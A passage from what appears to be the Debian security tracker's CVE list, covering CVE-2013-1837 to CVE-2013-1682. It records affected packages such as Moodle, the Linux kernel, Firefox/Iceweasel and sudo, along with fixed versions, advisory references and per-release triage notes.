- nova 2012.1.1-15 (bug #703064) CVE-2013-1837 RESERVED CVE-2013-1836 (Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and ...) - moodle 2.5-1 (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1835 (Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and ...) - moodle 2.5-1 (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1834 (notes/edit.php in Moodle 1.9.x through 1.9.19, 2.x through 2.1.10, 2.2 ...) - moodle 2.5-1 (low; bug #703870) [squeeze] - moodle (Minor issue) CVE-2013-1833 (Multiple cross-site scripting (XSS) vulnerabilities in the File Picker ...) - moodle 2.5-1 (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1832 (repository/webdav/lib.php in Moodle 2.x through 2.1.10, 2.2.x before 2 ...) - moodle 2.5-1 (bug #703870) [squeeze] - moodle (Vulnerable code not present) CVE-2013-1831 (lib/setuplib.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x b ...) - moodle 2.5-1 (low; bug #703870) [squeeze] - moodle (Minor issue) CVE-2013-1830 (user/view.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x befo ...) - moodle 2.5-1 (low; bug #703870) [squeeze] - moodle (Minor issue) CVE-2013-1829 (calendar/managesubscriptions.php in Moodle 2.4.x before 2.4.2 does not ...) - moodle (Only in 2.4 to 2.4.1) CVE-2013-1828 (The sctp_getsockopt_assoc_stats function in net/sctp/socket.c in the L ...) - linux (Introduced in 3.8) - linux-2.6 (Introduced in 3.8) CVE-2013-1827 (net/dccp/ccid.h in the Linux kernel before 3.5.4 allows local users to ...) - linux 3.2.29-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-47 CVE-2013-1826 (The xfrm_state_netlink function in net/xfrm/xfrm_user.c in the Linux k ...) {DSA-2668-1} - linux 3.2.32-1 (low) - linux-2.6 (low) NOTE: Probably gone since 3.2.32-1, but I checked 3.2.41-2 CVE-2013-1825 REJECTED CVE-2013-1824 (The SOAP parser in PHP before 5.3.22 and 5.4.x before 5.4.12 allows re ...) 
{DSA-2639-1} - php5 5.4.4-14 NOTE: See CVE-2013-1643 NOTE: https://git.php.net/?p=web/php.git;a=commitdiff;h=e8432b34ee7a196a14a6e0191a00fe73b5a095e7 CVE-2013-1823 (Cross-site scripting (XSS) vulnerability in the Notifications form in ...) NOT-FOR-US: Katello CVE-2013-1822 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 4.5.x ...) - owncloud (owncloud stable4 (4.0.x) is not affected) NOTE: https://owncloud.org/about/security/advisories/oC-SA-2013-008/ NOTE: https://www.openwall.com/lists/oss-security/2013/03/14/8 CVE-2013-1821 (lib/rexml/text.rb in the REXML parser in Ruby before 1.9.3-p392 allows ...) {DSA-2809-1 DSA-2738-1} - ruby1.9.1 1.9.3.194-8.1 (bug #702525) - ruby1.8 1.8.7.358-7 (bug #702526) NOTE: http://www.ruby-lang.org/en/news/2013/02/22/rexml-dos-2013-02-22/ CVE-2013-1820 (tuned before 2.x allows local users to kill running processes due to i ...) - tuned (Fixed before initial release to Debian) CVE-2013-1819 (The _xfs_buf_find function in fs/xfs/xfs_buf.c in the Linux kernel bef ...) - linux 3.8-1 - linux-2.6 (low) [squeeze] - linux-2.6 (Too risky to backport, minor impact) [wheezy] - linux (Too risky to backport, minor impact) CVE-2013-1818 (maintenance/mwdoc-filter.php in MediaWiki before 1.20.3 allows remote ...) - mediawiki (mwdoc-filter.php introduced in 1.20) NOTE: register_globals is not supported in Debian anyway, see PHP's README.Debian.security CVE-2013-1817 (MediaWiki before 1.19.4 and 1.20.x before 1.20.3 contains an error in ...) - mediawiki 1:1.19.4-1 (bug #702305) [squeeze] - mediawiki CVE-2013-1816 (MediaWiki before 1.19.4 and 1.20.x before 1.20.3 allows remote attacke ...) - mediawiki 1:1.19.4-1 [squeeze] - mediawiki CVE-2013-1815 (PackStack 2012.2.3 in Red Hat OpenStack Essex and Folsom can create th ...) NOT-FOR-US: OpenStack PackStack CVE-2013-1814 (The users/get program in the User RPC API in Apache Rave 0.11 through ...) 
NOT-FOR-US: Apache Rave CVE-2013-1813 (util-linux/mdev.c in BusyBox before 1.21.0 uses 0777 permissions for p ...) - busybox 1:1.20.0-8 (low; bug #701965) [wheezy] - busybox (Minor issue) [squeeze] - busybox (Minor issue) CVE-2013-1812 (The ruby-openid gem before 2.2.2 for Ruby allows remote OpenID provide ...) - ruby-openid 2.1.8debian-6 (bug #702217) - libopenid-ruby (bug #702217) [squeeze] - libopenid-ruby 2.1.8debian-1+squeeze1 CVE-2013-1811 (An access control issue in MantisBT before 1.2.13 allows users with "R ...) {DSA-3120-1} - mantis (low; bug #698481) [squeeze] - mantis (Unsupported in squeeze-lts) CVE-2013-1810 (Multiple cross-site scripting (XSS) vulnerabilities in core/summary_ap ...) - mantis (only affects MantisBT 1.2.12) CVE-2013-1809 (Gambas before 3.4.0 allows remote attackers to move or manipulate dire ...) - gambas3 3.5.1-1 (low; bug #702184) - gambas2 [wheezy] - gambas3 (Minor issue) [squeeze] - gambas2 (Minor issue) NOTE: https://code.google.com/p/gambas/issues/detail?id=365 CVE-2013-1808 (Cross-site scripting (XSS) vulnerability in ZeroClipboard.swf and Zero ...) - db4o (unimportant) - jenkins 1.509.2+dfsg-1 (bug #706725) CVE-2013-1807 (PHP-Fusion before 7.02.06 stores backup files with predictable filenam ...) NOT-FOR-US: PHP-Fusion CVE-2013-1806 (Multiple directory traversal vulnerabilities in PHP-Fusion before 7.02 ...) NOT-FOR-US: PHP-Fusion CVE-2013-1805 REJECTED CVE-2013-1804 (Multiple cross-site scripting (XSS) vulnerabilities in PHP-Fusion befo ...) NOT-FOR-US: PHP-Fusion CVE-2013-1803 (Multiple SQL injection vulnerabilities in PHP-Fusion before 7.02.06 al ...) NOT-FOR-US: PHP-Fusion CVE-2013-1802 (The extlib gem 0.9.15 and earlier for Ruby does not properly restrict ...) {DLA-172-1} - ruby-extlib 0.9.15-3 (bug #697895) - libextlib-ruby (bug #697895) CVE-2013-1801 (The httparty gem 0.9.0 and earlier for Ruby does not properly restrict ...) 
NOT-FOR-US: httparty Ruby gem CVE-2013-1800 (The crack gem 0.3.1 and earlier for Ruby does not properly restrict ca ...) - ruby-crack 0.3.2-1 CVE-2013-1799 (Gnome Online Accounts (GOA) 3.6.x before 3.6.3 and 3.7.x before 3.7.91 ...) - gnome-online-accounts (Incomplete patch wasn't applied in Debian) CVE-2013-1798 (The ioapic_read_indirect function in virt/kvm/ioapic.c in the Linux ke ...) {DSA-2668-1} - linux 3.2.41-2 - linux-2.6 NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/9 CVE-2013-1797 (Use-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel ...) - linux 3.2.41-2 - linux-2.6 [squeeze] - linux-2.6 (Too intrusive to backport, KVM server not supported in squeeze-lts) NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/9 CVE-2013-1796 (The kvm_set_msr_common function in arch/x86/kvm/x86.c in the Linux ker ...) {DSA-2669-1 DSA-2668-1} - linux 3.2.41-2 - linux-2.6 NOTE: https://www.openwall.com/lists/oss-security/2013/03/20/9 CVE-2013-1795 (Integer overflow in ptserver in OpenAFS before 1.6.2 allows remote att ...) {DSA-2638-1} - openafs 1.6.1-3 CVE-2013-1794 (Buffer overflow in certain client utilities in OpenAFS before 1.6.2 al ...) {DSA-2638-1} - openafs 1.6.1-3 CVE-2013-1793 (openstack-utils openstack-db has insecure password creation ...) NOT-FOR-US: openstack-utils CVE-2013-1792 (Race condition in the install_user_keyrings function in security/keys/ ...) {DSA-2668-1} - linux 3.2.41-1 - linux-2.6 CVE-2013-1791 RESERVED CVE-2013-1790 (poppler/Stream.cc in poppler before 0.22.1 allows context-dependent at ...) {DSA-2719-1} - poppler 0.18.4-6 (low; bug #702071) CVE-2013-1789 (splash/Splash.cc in poppler before 0.22.1 allows context-dependent att ...) - poppler (vulnerable code introduced in a later version) CVE-2013-1788 (poppler before 0.22.1 allows context-dependent attackers to cause a de ...) 
{DSA-2719-1} - poppler 0.18.4-6 (low; bug #702071) CVE-2013-1787 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1786 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1785 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1784 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1783 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in pag ...) NOT-FOR-US: Drupal addon CVE-2013-1782 (Cross-site scripting (XSS) vulnerability in the Responsive Blog Theme ...) NOT-FOR-US: Drupal addon CVE-2013-1781 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1780 (Cross-site scripting (XSS) vulnerability in the Best Responsive Theme ...) NOT-FOR-US: Drupal addon CVE-2013-1779 (Cross-site scripting (XSS) vulnerability in the 3 slide gallery in the ...) NOT-FOR-US: Drupal addon CVE-2013-1778 (Cross-site scripting (XSS) vulnerability in the Creative Theme 7.x-1.x ...) NOT-FOR-US: Drupal addon CVE-2013-1777 (The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as ...) NOT-FOR-US: JMX component of Apache Geronimo is not packaged CVE-2013-1776 (sudo 1.3.5 through 1.7.10 and 1.8.0 through 1.8.5, when the tty_ticket ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701839) CVE-2013-1775 (sudo 1.6.0 through 1.7.10p6 and sudo 1.8.0 through 1.8.6p6 allows loca ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701838) NOTE: severity depends a lot on the environment CVE-2013-1774 (The chase_port function in drivers/usb/serial/io_ti.c in the Linux ker ...) {DSA-2668-1} - linux 3.2.38-1 - linux-2.6 CVE-2013-1773 (Buffer overflow in the VFAT filesystem implementation in the Linux ker ...) 
	{DSA-2668-1}
	- linux 3.2.15-1
	- linux-2.6
	NOTE: Probably gone since 3.2.15-1, but I checked 3.2.41-2
CVE-2013-1772 (The log_prefix function in kernel/printk.c in the Linux kernel 3.x bef ...)
	- linux 3.2.39-1
	- linux-2.6 (Vulnerability exposed since 3.0)
CVE-2013-1771 (The web server Monkeyd produces a world-readable log (/var/log/monkeyd ...)
	- monkey (low)
	[squeeze] - monkey (Minor issue)
	NOTE: https://www.openwall.com/lists/oss-security/2013/02/24/5
CVE-2013-1770 (Cross-site scripting (XSS) vulnerability in views_view.php in Ganglia ...)
	- ganglia 3.6.0-1 (low; bug #700158)
	[squeeze] - ganglia (Minor issue)
	[wheezy] - ganglia (Minor issue)
	- ganglia-web 3.5.8-3 (bug #700159)
	NOTE: starting with 3.6.0-1 the web front is no longer built from src:ganglia so marking this version as fixed
	NOTE: Upstream non-verified fix https://github.com/ganglia/ganglia-web/commit/552965f33bf79d41ccbec3f1f26840c8bab54ad6
CVE-2013-1769 (A certain hashing algorithm in Telepathy Gabble 0.16.x before 0.16.5 a ...)
	- telepathy-gabble 0.16.5-1 (low; bug #702252)
	[squeeze] - telepathy-gabble (Minor issue)
CVE-2013-1768 (The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and ...)
	- openjpa 2.2.2-1 (bug #716937)
	[squeeze] - openjpa (Minor issue)
	[wheezy] - openjpa (Minor issue)
CVE-2013-1767 (Use-after-free vulnerability in the shmem_remount_fs function in mm/sh ...)
	{DSA-2668-1}
	- linux 3.2.41-1
	- linux-2.6
CVE-2013-1766 (libvirt 1.0.2 and earlier sets the group owner to kvm for device files ...)
	{DSA-2650-1}
	- libvirt 0.9.12-8 (bug #701649)
CVE-2013-1765 (Multiple cross-site scripting (XSS) vulnerabilities in jwplayer.swf in ...)
	NOT-FOR-US: WordPress plugin smart-flv
CVE-2013-1764 (The Zypper (aka zypp) backend in PackageKit before 0.8.8 allows local ...)
	- packagekit (Zypp backend specific to SuSE)
CVE-2013-1763 (Array index error in the __sock_diag_rcv_msg function in net/core/sock ...)
	- linux (Introduced in 3.3)
	NOTE: 3.6.9 and 3.7.8 in experimental are affected, 3.8 will be fixed.
CVE-2013-1762 (stunnel 4.21 through 4.54, when CONNECT protocol negotiation and NTLM ...)
	{DSA-2664-1}
	- stunnel4 3:4.53-1.1 (bug #702267)
CVE-2013-1761
	RESERVED
CVE-2013-1760 (The Bug Genie before 3.2.6 has Multiple XSS and HTML Injection Vulnera ...)
	NOT-FOR-US: Bug Genie
CVE-2013-1759 (Cross-site scripting (XSS) vulnerability in the Responsive Logo Slides ...)
	NOT-FOR-US: WordPress plugin responsive-logo-slideshow
CVE-2013-1758 (Cross-site scripting (XSS) vulnerability in the Marekkis Watermark plu ...)
	NOT-FOR-US: WordPress plugin marekkis-watermark
CVE-2013-1757
	RESERVED
CVE-2013-1756 (The Dragonfly gem 0.7 before 0.8.6 and 0.9.x before 0.9.13 for Ruby, w ...)
	NOT-FOR-US: Dragonfly Ruby gem
CVE-2013-1755
	RESERVED
CVE-2013-1754
	RESERVED
CVE-2013-1753 (The gzip_decode function in the xmlrpc client library in Python 3.4 an ...)
	- python2.5 (low)
	- python2.6 (low)
	- python2.7 2.7.9-1 (low; bug #742929)
	- python3.1 (low)
	- python3.2 (low)
	- python3.3 (low; bug #742928)
	- python3.4 3.4.2-4 (low; bug #742927)
	[jessie] - python3.4 (Minor issue)
	[squeeze] - python2.5 (Minor issue)
	[squeeze] - python2.6 (Minor issue)
	[wheezy] - python2.6 (Minor issue)
	[wheezy] - python2.7 (Minor issue)
	[squeeze] - python3.1 (Minor issue)
	[wheezy] - python3.2 (Minor issue)
	NOTE: http://bugs.python.org/issue16043
	NOTE: https://github.com/python/cpython/commit/eca72d47f5a639a0ac66a98a2d63b30df2ce310f (3.4)
CVE-2013-1752
	REJECTED
CVE-2013-1751 (TWiki before 5.1.4 allows remote attackers to execute arbitrary shell ...)
	- twiki
	NOTE: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2013-1751
CVE-2013-1750 (Heap-based buffer overflow in RealNetworks RealPlayer before 16.0.1.18 ...)
	NOT-FOR-US: RealPlayer
CVE-2013-1749 (Cross-site scripting (XSS) vulnerability in edit.php in PHP Address Bo ...)
	NOT-FOR-US: PHP Address Book
CVE-2013-1748 (Multiple SQL injection vulnerabilities in PHP Address Book 8.2.5 allow ...)
	NOT-FOR-US: PHP Address Book
CVE-2013-1747 (channel.c in ngIRCd 20 and 20.1 allows remote attackers to cause a den ...)
	- ngircd (Vulnerable version was only in experimental, introduced in 20.1-1~exp1 and fixed in 20.2-1~exp1)
CVE-2013-1746
	RESERVED
CVE-2013-1745
	RESERVED
CVE-2013-1744 (IRIS citations management tool through 1.3 allows remote attackers to ...)
	NOT-FOR-US: IRIS citations management tool
CVE-2013-1743 (Multiple cross-site scripting (XSS) vulnerabilities in report.cgi in B ...)
	- bugzilla (Only affects 4.1 to 4.4)
	- bugzilla4 (bug #669643)
	NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=924932
CVE-2013-1742 (Multiple cross-site scripting (XSS) vulnerabilities in editflagtypes.c ...)
	- bugzilla (low)
	[squeeze] - bugzilla (Minor issue)
	- bugzilla4 (bug #669643)
	NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=924802
CVE-2013-1741 (Integer overflow in Mozilla Network Security Services (NSS) 3.15 befor ...)
	{DSA-2994-1 DLA-23-1}
	- nss 2:3.15.3-1 (bug #735105)
	[squeeze] - nss 3.12.8-1+squeeze8
	NOTE: https://hg.mozilla.org/projects/nss/rev/612d7d1eb9e7
CVE-2013-1740 (The ssl_Do1stHandshake function in sslsecur.c in libssl in Mozilla Net ...)
	- nss 2:3.15.4-1
	[squeeze] - nss (false start disabled by default, needs to be enabled by clients)
	[wheezy] - nss (false start disabled by default, needs to be enabled by clients)
	NOTE: false start must be enabled by the client (mainly browsers)
CVE-2013-1739 (Mozilla Network Security Services (NSS) before 3.15.2 does not ensure ...)
	{DSA-2790-1}
	- nss 2:3.15.2-1 (bug #726473)
	[squeeze] - nss (Introduced in 3.14.3)
	NOTE: https://developer.mozilla.org/en-US/docs/NSS/NSS_3.15.2_release_notes
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1012656
CVE-2013-1738 (Use-after-free vulnerability in the JS_GetGlobalForScopeChain function ...)
	- iceweasel 24.0-1
	[wheezy] - iceweasel (Only affects Firefox > 17)
	[squeeze] - iceweasel
	- icedove (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1737 (Mozilla Firefox before 24.0, Firefox ESR 17.x before 17.0.9, Thunderbi ...)
	{DSA-2762-1 DSA-2759-1}
	- iceweasel 24.0-1
	[squeeze] - iceweasel
	- icedove 17.0.9-1
	[squeeze] - icedove
CVE-2013-1736 (The nsGfxScrollFrameInner::IsLTR function in Mozilla Firefox before 24 ...)
	{DSA-2762-1 DSA-2759-1}
	- iceweasel 24.0-1
	[squeeze] - iceweasel
	- icedove 17.0.9-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1735 (Use-after-free vulnerability in the mozilla::layout::ScrollbarActivity ...)
	{DSA-2762-1 DSA-2759-1}
	- iceweasel 24.0-1
	[squeeze] - iceweasel
	- icedove 17.0.9-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1734 (Cross-site request forgery (CSRF) vulnerability in attachment.cgi in B ...)
	- bugzilla (low)
	[squeeze] - bugzilla (Minor issue)
	- bugzilla4 (bug #669643)
	NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=913904
CVE-2013-1733 (Cross-site request forgery (CSRF) vulnerability in process_bug.cgi in ...)
	- bugzilla (Only affects 4.4)
	- bugzilla4 (bug #669643)
	NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=911593
CVE-2013-1732 (Buffer overflow in the nsFloatManager::GetFlowArea function in Mozilla ...)
	{DSA-2762-1 DSA-2759-1}
	- iceweasel 24.0-1
	[squeeze] - iceweasel
	- icedove 17.0.9-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1731 (Untrusted search path vulnerability in the GL tracing functionality in ...)
	- iceweasel (Android-specific)
	- icedove (Android-specific)
	- iceape (Android-specific)
CVE-2013-1730 (Mozilla Firefox before 24.0, Firefox ESR 17.x before 17.0.9, Thunderbi ...)
	{DSA-2762-1 DSA-2759-1}
	- iceweasel 24.0-1
	[squeeze] - iceweasel
	- icedove 17.0.9-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1729 (The WebGL implementation in Mozilla Firefox before 24.0, when NVIDIA g ...)
	- iceweasel (MacOS-specific)
	- icedove (MacOS-specific)
	- iceape (MacOS-specific)
CVE-2013-1728 (The IonMonkey JavaScript engine in Mozilla Firefox before 24.0, Thunde ...)
	- iceweasel 24.0-1
	[wheezy] - iceweasel (Only affects Firefox > 17)
	[squeeze] - iceweasel
	- icedove (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1727 (Mozilla Firefox before 24.0 on Android allows attackers to bypass the ...)
	- iceweasel (Android-specific)
	- icedove (Android-specific)
	- iceape (Android-specific)
CVE-2013-1726 (Mozilla Updater in Mozilla Firefox before 24.0, Firefox ESR 17.x befor ...)
	- iceweasel (Updater not used in Debian)
	- icedove (Updater not used in Debian)
	- iceape (Updater not used in Debian)
CVE-2013-1725 (Mozilla Firefox before 24.0, Firefox ESR 17.x before 17.0.9, Thunderbi ...)
	{DSA-2762-1 DSA-2759-1}
	- iceweasel 24.0-1
	[squeeze] - iceweasel
	- icedove 17.0.9-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1724 (Use-after-free vulnerability in the mozilla::dom::HTMLFormElement::IsD ...)
	- iceweasel 24.0-1
	[wheezy] - iceweasel (Only affects Firefox > 17)
	[squeeze] - iceweasel
	- icedove (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1723 (The NativeKey widget in Mozilla Firefox before 24.0, Thunderbird befor ...)
	- iceweasel 24.0-1
	[wheezy] - iceweasel (Only affects Firefox > 17)
	[squeeze] - iceweasel
	- icedove (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1722 (Use-after-free vulnerability in the nsAnimationManager::BuildAnimation ...)
	{DSA-2762-1 DSA-2759-1}
	- iceweasel 24.0-1
	[squeeze] - iceweasel
	- icedove 17.0.9-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1721 (Integer overflow in the drawLineLoop function in the libGLESv2 library ...)
	- iceweasel 24.0-1
	[wheezy] - iceweasel (Only affects Firefox > 17)
	[squeeze] - iceweasel
	- iceape (Only affects Firefox > 17)
CVE-2013-1720 (The nsHtml5TreeBuilder::resetTheInsertionMode function in the HTML5 Tr ...)
	- iceweasel 24.0-1
	[wheezy] - iceweasel (Only affects Firefox > 17)
	[squeeze] - iceweasel
	- icedove (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1719 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel 24.0-1
	[wheezy] - iceweasel (Only affects Firefox > 17)
	[squeeze] - iceweasel
	- icedove (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1718 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	{DSA-2762-1 DSA-2759-1}
	- iceweasel 24.0-1
	[squeeze] - iceweasel
	- icedove 17.0.9-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1717 (Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbi ...)
	{DSA-2746-1 DSA-2735-1}
	- iceweasel 17.0.8esr-1
	[squeeze] - iceweasel
	- icedove 17.0.8-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1716
	RESERVED
CVE-2013-1715 (Multiple untrusted search path vulnerabilities in the (1) full install ...)
	- iceweasel (Windows-specific)
CVE-2013-1714 (The Web Workers implementation in Mozilla Firefox before 23.0, Firefox ...)
	{DSA-2746-1 DSA-2735-1}
	- iceweasel 17.0.8esr-1
	[squeeze] - iceweasel
	- icedove 17.0.8-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1713 (Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbi ...)
	{DSA-2746-1 DSA-2735-1}
	- iceweasel 17.0.8esr-1
	[squeeze] - iceweasel
	- icedove 17.0.8-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1712 (Multiple untrusted search path vulnerabilities in updater.exe in Mozil ...)
	- iceweasel (Windows-specific)
	- icedove (Windows-specific)
	- iceape (Windows-specific)
CVE-2013-1711 (The XrayWrapper implementation in Mozilla Firefox before 23.0 and SeaM ...)
	- iceweasel (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1710 (The crypto.generateCRMFRequest function in Mozilla Firefox before 23.0 ...)
	{DSA-2746-1 DSA-2735-1}
	- iceweasel 17.0.8esr-1
	[squeeze] - iceweasel
	- icedove 17.0.8-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1709 (Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbi ...)
	{DSA-2746-1 DSA-2735-1}
	- iceweasel 17.0.8esr-1
	[squeeze] - iceweasel
	- icedove 17.0.8-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1708 (Mozilla Firefox before 23.0 and SeaMonkey before 2.20 allow remote att ...)
	- iceweasel (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1707 (Stack-based buffer overflow in Mozilla Updater in Mozilla Firefox befo ...)
	- iceweasel (Windows-specific)
	- icedove (Windows-specific)
	- iceape (Windows-specific)
CVE-2013-1706 (Stack-based buffer overflow in maintenanceservice.exe in the Mozilla M ...)
	- iceweasel (Windows-specific)
	- icedove (Windows-specific)
	- iceape (Windows-specific)
CVE-2013-1705 (Heap-based buffer underflow in the cryptojs_interpret_key_gen_type fun ...)
	- iceweasel 23.0-1
	[wheezy] - iceweasel (Only affects Firefox > 17)
	[squeeze] - iceweasel (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1704 (Use-after-free vulnerability in the nsINode::GetParentNode function in ...)
	- iceweasel (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1703
	REJECTED
CVE-2013-1702 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel (Only affects Firefox > 17)
	- icedove (Only affects Firefox > 17)
	- iceape (Only affects Firefox > 17)
CVE-2013-1701 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	{DSA-2746-1 DSA-2735-1}
	- iceweasel 17.0.8esr-1
	[squeeze] - iceweasel
	- icedove 17.0.8-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1700 (The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Wind ...)
	- iceweasel (Only affects Firefox > 17)
CVE-2013-1699 (The Internationalized Domain Name (IDN) display algorithm in Mozilla F ...)
	- iceweasel (Only affects Firefox > 17)
CVE-2013-1698 (The getUserMedia permission implementation in Mozilla Firefox before 2 ...)
	- iceweasel (Only affects Firefox > 17)
CVE-2013-1697 (The XrayWrapper implementation in Mozilla Firefox before 22.0, Firefox ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1696 (Mozilla Firefox before 22.0 does not properly enforce the X-Frame-Opti ...)
	- iceweasel (Only affects Firefox > 17)
CVE-2013-1695 (Mozilla Firefox before 22.0 does not properly implement certain DocShe ...)
	- iceweasel (Only affects Firefox > 17)
CVE-2013-1694 (The PreserveWrapper implementation in Mozilla Firefox before 22.0, Fir ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1693 (The SVG filter implementation in Mozilla Firefox before 22.0, Firefox ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1692 (Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbi ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1691
	RESERVED
CVE-2013-1690 (Mozilla Firefox before 22.0, Firefox ESR 17.x before 17.0.7, Thunderbi ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1689 (Mozilla Firefox 20.0a1 and earlier allows remote attackers to cause a ...)
	[wheezy] - iceape
CVE-2013-1688 (The Profiler implementation in Mozilla Firefox before 22.0 parses untr ...)
	- iceweasel (Only affects Firefox > 17)
CVE-2013-1687 (The System Only Wrapper (SOW) and Chrome Object Wrapper (COW) implemen ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1686 (Use-after-free vulnerability in the mozilla::ResetDir function in Mozi ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1685 (Use-after-free vulnerability in the nsIDocument::GetRootElement functi ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1684 (Use-after-free vulnerability in the mozilla::dom::HTMLMediaElement::Lo ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-1683 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel (Only affects Firefox 21)
	- icedove (Only affects Firefox 21)
	- iceape (Only affects Firefox 21)
CVE-2013-1682 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	{DSA-2720-1 DSA-2716-1}
	- iceweasel 17.0.7esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
